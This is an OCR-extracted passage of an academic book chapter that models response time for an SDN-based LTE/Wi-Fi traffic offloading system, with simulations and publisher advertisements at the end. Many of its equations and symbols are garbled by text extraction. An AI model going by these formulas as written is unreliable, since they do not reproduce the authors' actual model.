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[27-30] which were not considered in evaluating the efficiency of the 
SDN-based data traffic offloading system (SDN-TOS). As shown in Table 
12.1, each study is missing certain important parameters when estimating 
the computation time. 

For instance, load balancing, open flow switches and observing user 
satisfaction on response time of data traffic offloading system(s) and 
throughput (bits/sec) are some of the elements not considered in most of 
the previous work. This study aims to perform higher accuracy for com- 
putation time by considering all the offloading tasks related to SDN-based 
data traffic offloading processes. To prove this phenomenon, we compare 
our model with the CSP approach [36], which only considered node-based 
offloading task throughout one network. Further, we intend to identify 
essential parameters which directly affect the mobile and data communi- 
cation performances using different service providers. 


12.1.2 Objective 


The objective of this chapter is to accurately estimate the computation time 
for a software-defined networking-based data traffic offloading system in a 
heterogeneous network using the essential parameters. 


12.1.3 The Main Contributions of This Chapter 


1) Estimate the computation time for a software-defined 
networking-based data traffic offloading system in a het- 
erogeneous network. 

2) Identify essential parameters that impact the real-time 
performances of mobile and data communication services. 

3) Identify the value of the load balancing mechanism with 
allowing high efficiency in centralized SDN controller to 
handle different control functions. 


The rest of this chapter is organized as follows: Section 12.2 explains 
the SDN-TOS mechanism. The computation model for the time con- 
sumption of our system is presented in Section 12.3. Section 12.4 rep- 
resents the results of our analysis using our proposed computation 
model. Section 12.5 provides a related discussion. Finally, the chapter 
concludes in Section 12.6. 
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12.2 Analysis of SDN-TOS Mechanism 


In the scheme of LTE and Wi-Fi offloading cellular traffic scenario, an 
SDN-based system considers a higher overall throughput for mobile users. 
Meanwhile, utilization of the network resources also increases with pro- 
viding better network performance for a mobile wireless network. In this 
section, we discuss the key design considerations of the SDN-TOS system. 


12.2.1 Key Components of SDN-TOS 
12.2.2 LTE/Wi-Fi in a Heterogeneous Network (HetNet) 


The heterogeneous network provides better service provision to inspire 
the mobile service operators who are able to transit the LTE network into 
HetNet due to the insufficient bandwidth in a cellular network. In fact, 
the integration of the LTE and Wi-Fi network can be allocated as network 
selection and network flow scheduling. 


12.2.3 Centralized SDN Controller 


Centralized SDN controller methodology can be used in the logically 
implemented platform by using the control logic technique. Different 
types of network device behavior are consolidated in a centralized SDN 
controller platform as follows: 


a) Load balancing: 
To reduce the response time of the SDN controller, the load 
balancing technique [37] allows a large number of network 
packets by allocating them to different node devices. To 
overcome the problem of scalability and reliability issues 
of a centralized SDN controller, load distribution among 
sub-controllers needs to be allowed through the load bal- 
ancing mechanism. 

b) Network Traffic steering: 
As an emerging technology that is directly considered on 
data traffic offloading problem, traffic steering [28] concerns 
the bandwidth allocation and set of networks that lead net- 
work transmission to a traffic offloading solution. 
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12.2.4 Key Design Considerations of SDN-TOS 


To anticipate the optimal path selection for multipath Transmission 
Control Protocol (TCP) sub-flows, some considerations are needed related 
to 1) collecting network status information, 2) Optimal path selection via 
bandwidth allocation module, and 3) optimal path configuration, for every 
mobile user within the LTE and Wi-Fi range through centralized SDN con- 
troller. Guidance of open flow switches that rely on pen standard protocol, 
such as open-flow [39] is more important to consider than where to for- 
ward the packet. 


12.2.4.1 The System Architecture 


The SDN-TOS architecture consists of several main parts as shown in 
Figure 12.1, the system architecture of Software-defined network-based 
data traffic offloading system (SDN-TOS): Mininet Wi-Fi emulator which 
is considered both LTE network and Wi-Fi network with using open flow 
switches to make communication protocol (open flow protocol) and used 
Multipath TCP sub-flows and ANDSF to make proper network selection 
and SDN controller which is doing three major functionalities, such as net- 
work information monitoring, optimal bandwidth allocation (OBA) mod- 
ule and optimal path configuration while using load balancing technique 
to handle the workload of the controller. 


12.2.4.2. Mininet Wi-Fi Emulated Networks 


a) Wi-Fi network: 
The Wi-Fi access point accepting wireless connections from 
mobile users examines in the OVS (OpenvSwitch), which 
establishes as the core of the Wi-Fi emulated network. The 
purpose of the Mininet emulator is to add virtualized- 
wireless interfaces to SDN switch(es). Then it uses Linux 
kernel to configure them into wireless medium. 

b) LTE network: 
Linux traffic control mechanism grants in the formulation 
of LTE network in Mininet Wi-Fi platform while initiating 
cellular channel characteristics such as network bandwidth, 
link latency, and jitter. On this basis, longer latency and a 
large bandwidth pool are established in the LTE network. 


Open flow protocol 
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Figure 12.1 The system architecture of Software-defined network-based data traffic 
offloading system (SDN-TOS). 


12.2.4.3 Software-Defined Networking Controller 


a) 


Network status information collection: 

The sub-controller of SDN centralized controller which 
inspects the network status information provides the col- 
lected information to the bandwidth allocation module to 
envision the best path (considers the best performance along 
with connectivity between mobile user devices and network 
systems). 
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b) Optimized bandwidth allocation (OBA) module: 
The network status information gathered by the sub- 
controller will be the absorption of the OBA module to 
adjust the optimal path selection. 

c) Optimal path configuration: 
Open flow table supports the decision of path selection 
in the SDN sub-controller. It contains the matching fields 
and the actions needed to set up in path configuration. The 
most appropriate implementation technique is assigning the 
unique IP address for each mobile device whenever it is con- 
nected to the heterogeneous network. 


12.3. Materials and Methods 


In this section, we consider estimating the response time of SDN-TOS 
using the following computation model. The SDN-TOS mainly considers 
two significant parts which are established between mobile service pro- 
viders and mobile service requesters such as Mininet Wi-Fi emulator and 
SDN controller. Time consumption of both Wi-Fi emulator and SDN- 
controller play a vital role in determining the efficiency of the Data traffic 
offloading system. 


12.3.1 Estimating Time Consumption for Mininet 
Wi-Fi Emulator 


In the cellular network environment, the characteristics and parameters 
are defined regarding the optimal number of cellular network nodes. Every 
mobile service operator takes the appropriate number of nodes that they 
feel is well suited to the relevant area with identifying its density and the 
network resources. Mobile devices are typically encouraged to set up a 
Multipath Transmission Control Protocol (MPTCP). In addition, MPTCP 
[28] enables the benefits over SDN-TOS such as traffic splitting, mini- 
mum transmission interruption, and quality of service (QoS). Execution 
of mobile service and data traffic offloading process consumes a signifi- 
cant amount of time to complete the task of Mininet emulator. Figure 12.2 
shows the overview of Mininet Wi-Fi emulator: Two significant categories 
for the time consumption of Wi-Fi emulator can be represented as LTE 
network (1: n number of network nodes) and Wi-Fi network (1: m num- 
ber of network nodes) as our assumptions. Mobile devices are typically 
encouraged to set up Multipath Transmission Control Protocol (MPTCP). 
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‘MPTCP 


Figure 12.2 Overview of Wi-Fi Mininet emulator including LTE network and Wi-Fi 
network. 


12.3.1.1 Total Time Consumption for Offloading the Data Traffic 
by Service Provider 


During the task of Mininet emulator, the mobile service provider's time to 
complete their service on provider node Step 01 - N that requested by the 
mobile service requester is the performance measurement of mobile ser- 
vice composition. CPU cycles dominate the time consumption of mobile 
service. The computation capability that considers the number of CPU 
cycles per node is essential to execute the mobile service. In this scenario, 
the proposed data traffic offloading system has a mobile edge computing 
environment, and latency is a significant factor for it. At this point, we 
assume that latency is a constraint. Demonstrating these steps, Figure 12.3 
shows the time Computation model for SDN-based data traffic offloading 
(SDN-TOS) system: 
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Figure 12.3 Time computation model for SDN-based data traffic offloading (SDN-TOS) system. 
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a) Step1: First estimate the execution time for service 
provider. 

b) Step 2: Then the time for offloading task 

c) Step 3: and time consumption of both LTE and Wi-Fi net- 
works. This will be used to acquire the response time of the 
Wi-Fi emulator. 

d) Step 4: To estimate the time consumption of the SDN con- 
troller as Section B, acknowledge time a load measurement 
is used to build the response time for the SDN controller. 

e) Steps 5 to 8: Next, using Step 4, the response time of three 
primary SDN sub-controllers and centralized SDN con- 
troller are estimated. 

f) Finally, combining Sections A and B, the total time con- 
sumption of the proposed system can be obtained. 


First, we use Equation 12.1 to calculate the total response time to com- 
plete the offloading process. The data traffic offloading task from one node 
to another in the heterogeneous network concerns both sending data and 
receiving data of the service provider. This phenomenon that depends on 
data size 0, 8, and uplink data rate is considered in Step 2 of our com- 
putation model. The service provider is responsible for offloading both 
sending data and receiving data to give better output to the mobile service 
requests. Executing the mobile service and data traffic offloading process 
dominates the overall performance of the Mininet emulator for both Wi-Fi 
and LTE network. We adapt the work of [36] which feels very well suited 
for the time consumption of the Wi-Fi emulator. We can represent &, as 
uplink data rate while assuming that the uplink data rate is similar to the 
downlink data rate. Let 8, and 6, be the incoming and outgoing computa- 
tional data traffic on the service provider node. Let us take tas a number 
of CPU cycles required on the service provider node, and t, is the compu- 
tational capability of the service provider node. We evaluate the total time 
consumption for offloading the traffic by service provider T, by, 


T,(N)= ma Ee E. (12.1) 


where N is the service provider node (N = 1,2,3,...,2), where n is the num- 
ber of service provider nodes in the relevant area. 
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12.3.1.2 Total Time Consumption of Mininet Wi-Fi Emulator 
(Time Consumption for Both LTE and Wi-Fi Network) 


The SDN-TOS system is focused on the heterogeneous network, which 
is considered on both Wi-Fi and LTE network. The uplink data rates for 
service provider and service requester consider as same for both LTE and 
Wi-Fi networks to calculate the total time consumption of offloading the 
data traffic Step 03. 

Let us consider that T’,,,, is time consumption for the Wi-Fi network 
traffic offloading process when T,,,,is time consumption for the LTE net- 
work. The mobile service provider uses the same data traffic volume for 
each mobile network in the same mobile service geographical area. Hence, 
the input and output data size of the service provider node have the same 
values for both the Wi-Fi and LTE network. The total time consumption 
of the Mininet emulator (T,,,) (Part A) is the sum of time for the Wi-Fi 
network and LTE network. Total time consumption for Mininet emulator 
(T,,,) is represented by Equation 12.2. 


Sub Controllers 


S81 OS: 0S3 OSK OS; OS2 OS3 OS; > \OS1 OS2 OS3 OSm 


Open flow swithes 


Figure 12.4 The overview of centralized SDN controller with three major sub-controllers: 
network status monitoring controller (NSM), bandwidth allocation sub-controller (BC) 
and edge device updating sub-controller (EDU). 
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Tue = ye an DT ) (12.2) 
L=1 W=l 


Using Equation 12.1 and Equation 12.2, the total time consumption of 
Mininet Wi-Fi Emulator can be calculated as shown in Equation 12.3, 


= He, 9 | + Hw , 1 | 9 


(12.3) 
ia TL EL EL al Tw ew ew 


LTE nodes can be denoted as L (L = 1,2, 3..., n) instead of N in Equation 
12.1, where n is the number of nodes of LTE network in the relevant area 
of the mobile service provider and Wi-Fi node can be denoted as W (W = 
1,2, 3..., m) instead of N in Equation 12.1, where m is the number of Wi-Fi 
access points. 


12.3.2 Estimating Time Consumption for SDN Controller 


During the task of data traffic offloading execution, the SDN controller 
involves completing different functions as discussed in Section 12.2. SDN 
controller act as a centralized controller to give different output for the 
configurations of the system through open flow protocol [39]. 

The different response time consumes for those different functions of 
SDN centralized controller of SDN-TOS system regarding the number of 
open flow switches. The idea of sub-controllers and their architecture with 
the number of switches and relationship with the significant controller can 
be interpreted making a clear path to build formulas. Figure 12.4 shows 
the overview of Centralized SDN controller. It handles three major sub- 
controllers such as network status monitoring controller (NSM) which is 
used k number of open flow switches, Bandwidth allocation sub-controller 
(BC) which is used / number of open flow switches and Edge device updating 
sub-controller (EDU) which can be used m number of open flow switches. 


12.3.2.1_ Total Response Time for Sub-Controller 


The total response time of the sub-controller (T..) (Step 04) depends on the 
response time of the sub-controller for the number of open flow switches 
and its workload. Total response time of sub-controller can be expressed as 


response time for the number of switches of the controller T,, divided by 
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the load measurement of the subcontroller. Response time for the number of 
switches T,,.can be derived from the time difference between data packet 
IN message reaching time and acknowledging time for datapacket-out mes- 
sage. Load measurement of sub-controller I, depends on packet IN mes- 
sages and the number of open flow switches. The work of [37] contributed to 
building up the formulas of this section. The number of open flow switches 
starts from 2, which means that every SDN sub-controller must have a min- 
imum of 2 open flow switches for both LTE and Wi-Fi network. 

Let C, be SDN sub-controller number, when n = 1, 2 or 3 (SDN-TOS 
system has three major sub-controllers and it can be represented by 
C,,C,andC,). Hence, Response time for the number of switches of SDN 
controller T..can be represented in Equation 12.4, 


by x 
Tack Tack 
u=2 u=2 
b 
Tc, 


Tco(u) = (12.4) 


where u (u = 2, 3..., y) is the open flow switches, y is the maximum number 
of open flow switches of sub-controllers of centralized SDN controller. 


12.3.2.2_ Total Response Time for The Total Process of Centralized 
SDN Controller 


The estimation of the total response time of SDN centralized controller is 
considered to estimate the response time of different sub-controllers such 
as network status monitoring (NSM) as sub-controller 1 - t, (Step 05), 
bandwidth computerization (BC) as the 2™ sub-controller t,, Step 06 and 
edge device updating (EDU) as sub-controller 3 - t, (Step 07). 

A centralized SDN controller also requires some amount of time con- 
sumption to give its response for the sub-controllers before completing the 
task of SDN-based controller. Every sub-controller has a minimum of 2 open 
flow switches. Consequently, centralized SDN controller has minimum open 
flow switches q = (i+ j + s) = (2+2+2), therefore q = 6. SDN response time 
(Step 08) can be represented as ft... Let us take T’.,, P.., [.,andT,.,,as the load 
measurements of sub-controllers and major controller. The total response 
time of SDN-based controller T,,.can be calculated using Equation 12.5, 


Ta =to +t, +h +t (12.5) 
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Using Equation 12.4 and Equation 12.5, the total time consumption by 
centralized SDN controller can be calculated using Equation 12.6. 


k v h 
Tack Tack Tack » Tack 
Tes — i=2 2 s=2 q=6 
Vo we lc, Voy 
(12.6) 


where i(i= 2,3,4...,k) is the number of open flow switches of NSM control- 
ler, where k is the number of open flow switches of NSM, j (j = 2,3,4...,0) is 
the number of open flow switches of BC controller, where / is the number 
of open flow switches of BC controller, s (s = 2,3,4...,v) is the number of 
open flow switches of EDU controller, where v is the number of open flow 
switches of EDU controller, q (q = 6,7,8...,h) is the total number of switches 
of a major SDN controller, thus h is the number of open flow switches of 
SDN centralized controller. 


12.3.3 Estimating Total Time Consumption for SDN-Based 
Traffic Offloading System (SDN-TOS) 


The total process of the SDN-based traffic offloading system works 
through SDN centralized controller and Mininet Wi-Fi emulator. When 
the SDN controller completes the significant process of SDN-TOS, the 
Mininet Wi-Fi emulator provides the virtualized wireless interfaces to the 
SDN controller’s open flow switches and completes the configuration task 
through a wireless medium. Consequently, it can be determined that the 
SDN controller and Wi-Fi emulator has a significant relation to complete 
the data offloading process of SDN-TOS. Then, the total time consump- 
tion for the SDN-TOS system can be estimated with the sum of time con- 
sumption for the Mininet Wi-Fi emulator and time consumption for the 
Centralized SDN controller. Total time consumption for SDN-based traffic 
offloading system (SDN-TOS) T, can be calculated using Equation 12.7, 


T= Tat Tye (12,7) 
Using Equation 12.3, Equation 12.6 and Equation 12.7, Equation 12.8 


calculates the total time consumption for SDN-based traffic offloading 
system (SDN-TOS) 
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12.4 Simulation Results 


Our results and analysis are performed using MATLAB (MathWorks Inc., 
Natick, MA, USA) R2019b on a computer with macOS High Sierra (Version 
10.13.6, Apple, CA, USA), on a computer with 1.7 GHz Intel Core i7 CPU, 
4 GB 1600 MHz DDR3 RAM. The essential parameter values such as input 
computational data traffic for both LTE and Wi-Fi networks and estimated 
response time for the SDN-TOS process are used in our simulation. All the 
parameter values used in our computation model are listed in Table 12.2. 
There we also indicate the references where those values are originated. 
The values related to the process of Mininet emulator are acquired from 
an Asian Mobile communication company through a third-party broker. 

In our simulations, we consider a cellular network of randomly selected 
geographical area with N = 4 network nodes. We assume that the number 
of network nodes is similar for both LTE and Wi-Fi networks in the same 
geographical area. We consider the parameter values in Table 12.2 as the 
values used by Service Provider A. 

Regarding Service Provider A, input computational data traffic value 0, 
for both LTE and Wi-Fi networks is set to 320 Mb and Output computa- 
tional data traffic value 0, is set to 288 Mb. Consequently, it can be possibly 
referred that input and output computational data traffic values are nearly 
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Table 12.2 Parameter values used in the computation model. 


Constant (C)/ 
varied (V) 
Symbol | Description Parameter value 


Service provider node 
Hy Num of CPU cycles on LTE 1000 
provider node. megacycles 
HL, Num of CPU cycles on Wi-Fi 1000 
provider node. megacycles 
T, computational capability of 50 mega cycles/ 
LTE node sec 
Ty computational capability of 50 mega cycles/ 
Wi-Fi node sec 


Input computational data size 320 Mb (Mega | V 
bites) 


ce. Uplink data rate 16 Mbps 
(Megabits per 
second) 
Output computational data size | 288 Mb (Mega 
bites) 
ie Time consumption for Mininet | s (seconds) 
wi-fi emulator. 


V 
C 
C 
C 
C 
C 


SDN controller's response time 
Load measurement of SDN J (joule) 
controller 
Dee Acknowledge time V 
Packet In messages to SDN 
controller 
a Total response time of SDN 110s Vv 

controller (seconds) [29] 

t., response time of network status | s (seconds) Vv 
monitoring controller 


Vv 
L, Vv 
ben Vv 
T Vv 
T 


[E 
Cn 
Ss 


(Continued) 
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Table 12.2 Parameter values used in the computation model. (Continued) 


Constant (C)/ 
varied (V) 

Symbol | Description Parameter value 
fs, response time of optimal s (seconds) Vv 

bandwidth computerization 

controller 
t, response time of Edge device s (seconds) Vv 

updating 
i, Total time consumption of s (seconds) Vv 

SDN - TOS system 


the same. For this reason, we only varied the input computational data 
traffic from 0 to 400 Mb with total response time for each data traffic values 
if uplink data rate, Num of CPU cycles on LTE provider node and Wi-Fi 
provider node, computational capability of LTE node and Wi-Fi node and 
total response time for SDN controller are assumed to be constant. 

Then, we compare the effect of computational data traffic on response 
time between different service providers. The values listed in Table 12.2 are 
taken as Service Provider A. We use different values for Service Provider B 
as another service provider that related to our comparison. Let us consider 
that both service providers handle 4 network nodes in randomly selected 
mobile service station. In this scenario, the uplink data rate (€,, €) is set 
to 20 Mbps, and computational capability (t,, t,,) is set to 100 megacycles 
for Service Provider B. For all our simulation, the total response time for 
centralized SDN controller, T.,= 110 s of SDN-TOS is considered, as in 
[29] for both Service Provider A and Service Provider B. 


12.4.1 Effect of Computational Data Traffic 0, on Total 
Response Time (T,)/Service Provider A 
and CSP Approach 


In this scenario, the CSP approach is only considered one network when 
our computational model considers both LTE and Wi-Fi network. Further, 
our computation model considers the response time of the SDN controller 
as well. As illustrated in Figure 12.5, we observe that the effect of com- 
putational data traffic on the total response time of our model is slightly 
higher than the CSP approach computation model [36]. CSP approach 
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Figure 12.5 Effect of computational data traffic (0) on the total response time of SDN- 
TOS (T,) in our model and CSP approach. 


[36] selects the node-based method to estimate the total response time of 
the offloading process with only one network. In addition, we consider 
that our computation model represents every possible time consumption 
during the data traffic offloading process. Hence, this illustration contrib- 
utes to determining that our computational model gives a highly accurate 
value for the response time of the SDN-based data traffic offloading pro- 
cess. Moreover, this comparison can help us to find out that time consump- 
tion of all the networks which are needed to consider for offloading the 
data traffic. Besides, time consumption for the SDN controller’s task is also 
more important to measure the effectiveness of the SDN-based data traffic 
offloading process. 


12.4.2 Effect of Computational Data Traffic 0, on Total 
Response Time (T,) for Different Service Providers/ 
Service Provider A and Service Provider B 


Next, we vary the input computational data traffic value 0, effected on total 
response time to reflect the essential parameters affected by the data traffic 
offloading task. For this evaluation, we consider the different values for 
different service providers - Service Provider A and Service Provider B. 
As indicated in Figure 12.6, Service Provider A shows the dramatic 
increase in the effect of computational data traffic on response time when 
compared to Service Provider B. Note that when values of uplink data rate 
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Figure 12.6 Effect of computational data traffic (0,) on the total response time of SDN- 
TOS (T,) for different service providers - Service Provider A and Service Provider B. 


(€,§,)» and computational capability (t,, t,,) increase, total response time 
for SDN-based data traffic offloading process decreases. Interestingly, the 
effect of computational data traffic 8, becomes high by low values of uplink 
data rate (&,, §) and computational capability (t,, t,,) of service provider 
nodes as in Figure 12.6. 

Hence, we can observe that uplink data rate and computational capabil- 
ity affect the SDN-based data traffic offloading process regarding the effect 
of data traffic on total response time, in a given mobile service station of a 
service provider. 


12.5 Discussion 


With the rapid development of distributed cloud computing architecture 
and IoT, the amount of transmitting data is increasing. This increase can 
affect performance of data transmission, making it important to under- 
stand how to calculate accurate response time. Therefore, this study set out 
with the aim of assessing the importance of estimating the response time 
of the SDN-based data traffic offloading system. The purpose of our model 
is to identify the effectiveness and efficiency of the offloading system for 
handling the data traffic in the heterogeneous network. 
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The most exciting finding was that our computational model has higher 
response time since there is extra time in data traffic offloading through 
the SDN controller and more cellular networks as compared to the CSP 
approach [36] model. Since the CSP approach computes time by only con- 
sidering node-based offloading task throughout one network and as we 
compare more parameters including offloading traffic of LTE and Wi-Fi 
networks, we can observe that our computation model produces a more 
accurate value for the response time of SDN-TOS. Furthermore, there are 
studies [40-42] that discuss delays in LTE and Wi-Fi networks indicating 
the importance of considering its offloading traffic. 

As shown in Figure 12.5, our model shows 950 seconds while CSP 
approach shows 600 seconds as the total time consumption of SDN - TOS 
for input computational data traffic of 350 Mb. That is a 350-second dif- 
ference which means CSP approach shows 36.84% less time compared to 
the more accurate time. Therefore, our results show that the significance of 
computation capability and data uplink rate are difficult to ignore during 
the data offloading task. In fact, parameter values of computation capabil- 
ity and data uplink rate have a significant impact on SDN-based data traffic 
offloading speed. 

Furthermore, Figure 12.6 shows that when we double the computa- 
tional capability of LTE and Wi-Fi, total time consumption of SDN - TOS 
decreases. We used 50 mega cycles per seconds of computational capabil- 
ity (t,, t,,) for provider A and 100 mega cycles per second for provider B. 
We also used 16Mbps of Uplink data rate for provider A and 20Mbps for 
provider B. When the computational data traffic (0,) is 350, the total time 
consumption of SDN - TOS of provider B is decreased by 26.32% proving 
the importance of considering computation capability and data uplink rate 
when estimating the SDN-based data traffic offloading speed accurately. 

The results also indicate that computing the response time of the SDN 
controller is necessary to control different multiple sub-controllers with 
understanding the process of load balancing mechanism. This phenom- 
enon is not considered in other computation models [36]. These findings 
allow identifying important implications for developing the SDN-based 
data traffic offloading systems. Hence, mobile and data service providers 
have the responsibility to consider the workload of the SDN-controller 
[38], the most appropriate parameters and the best method to accurate 
estimation of response time during the SDN-based data traffic offloading 
task in data and mobile communication. 

Moreover, studies have been carried out in different industries that 
emphasize the importance of calculating the performance accurately. 
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One of the studies on Vehicular Networks [43] shows the importance of 
knowing the end-to-end delay which includes all the components. Also, a 
study on cloud gaming [44] or gaming as a service highlights the perfor- 
mance evaluation in SDN-enabled game-aware routing. In this industry, 
it is crucial to have high performance as they live-stream. A research on 
“SDN-Based Multi-Tier Computing and Communication Architecture for 
Pervasive Healthcare” [45] reveals how accuracy of the system can change 
due to service delay sensitivity. Additionally, estimating the computation 
time and understanding the offloading traffic performance is important for 
more researches such as traffic matrix estimation [46], network resource 
management [47], energy optimized wireless sensor networks [48], and 5G 
mobile networks [49-52]. 


12.6 Conclusion 


In this study, we proposed a realistic, comprehensive computation model to 
estimate the response time of the SDN-based data traffic offloading process 
for data and mobile communication services. Our results indicate that if a 
centralized SDN controller increases its workload with different functions 
through different sub-controllers, the SDN-TOS may have a significant 
increase in its response time. It also indicates that the time consumption 
of the SDN-TOS is minimized by increasing the values of computation 
capability and uplink data rate used in the data traffic offloading process. 
The computation capability and uplink data rate of the data traffic offload- 
ing process play a significant role in real-time decision making for data 
and mobile communication services. This understanding on computa- 
tional time estimation expands and opens future research opportunities on 
increasing the performance of SDN-based data traffic offloading process 
showing which components future studies should pay more attention to. 
However, if the architecture we examined changes with the technological 
advancements, it may require further research on this area to calculate the 
computational time with more or less parameters to be considered. 

Our study inspires real-time performance by maximizing the speed of 
SDN-TOS to provide faster service for mobile and data communication 
services. Taken together, these findings enhance our understanding to 
design a precise SDN-TOS for a given time to offload the data traffic, with 
all the essential factors that influence the performance in a heterogeneous 
network, for example, data and mobile communication services. 
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team of international experts, this is the most comprehensive and up-to- 
date coverage of the security and privacy issues surrounding Industry 4.0 
applications, a must-have for any library. NOW AVAILABLE! 
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CYBER SECURITY AND DIGITAL FORENSICS: Challenges and Future 
Trends, Edited by Mangesh M. Ghonge, Sabyasachi Pramanik, Ramchandra 
Mangrulkar, and Dac-Nhuong Le, ISBN: 9781119795636. Written and 
edited by a team of world renowned experts in the field, this groundbreak- 
ing new volume covers key technical topics and gives readers a compre- 
hensive understanding of the latest research findings in cyber security and 
digital forensics. NOW AVAILABLE! 


DEEP LEARNING APPROACHES TO CLOUD SECURITY, Edited by 
Pramod Singh Rathore, Vishal Dutt, Rashmi Agrawal, Satya Murthy 
Sasubilli, and Srinivasa Rao Swarna, ISBN: 9781119760528. Covering one 
of the most important subjects to our society today, this editorial team 
delves into solutions taken from evolving deep learning approaches, solu- 
tions allow computers to learn from experience and understand the world 
in terms of a hierarchy of concepts. NOW AVAILABLE! 


MACHINE LEARNING TECHNIQUES AND ANALYTICS FOR CLOUD 
SECURITY, Edited by Rajdeep Chakraborty, Anupam Ghosh and Jyotsna 
Kumar Mandal, ISBN: 9781119762256. This book covers new methods, 
surveys, case studies, and policy with almost all machine learning tech- 
niques and analytics for cloud security solutions. NOW AVAILABLE! 


SECURITY DESIGNS FOR THE CLOUD, IOT AND _ SOCIAL 
NETWORKING, Edited by Dac-Nhuong Le, Chintin Bhatt and Mani 
Madhukar, ISBN: 9781119592266. The book provides cutting-edge 
research that delivers insights into the tools, opportunities, novel strate- 
gies, techniques, and challenges for handling security issues in cloud com- 
puting, Internet of Things and social networking. NOW AVAILABLE! 


DESIGN AND ANALYSIS OF SECURITY PROTOCOLS FOR 
COMMUNICATION, Edited by Dinesh Goyal, S. Balamurugan, Sheng- 
Lung Peng and O.P. Verma, ISBN: 9781119555643. The book combines 
analysis and comparison of various security protocols such as HTTP, 
SMTP, RTP, RTCP, FTP, UDP for mobile or multimedia streaming security 
protocol. NOW AVAILABLE! 
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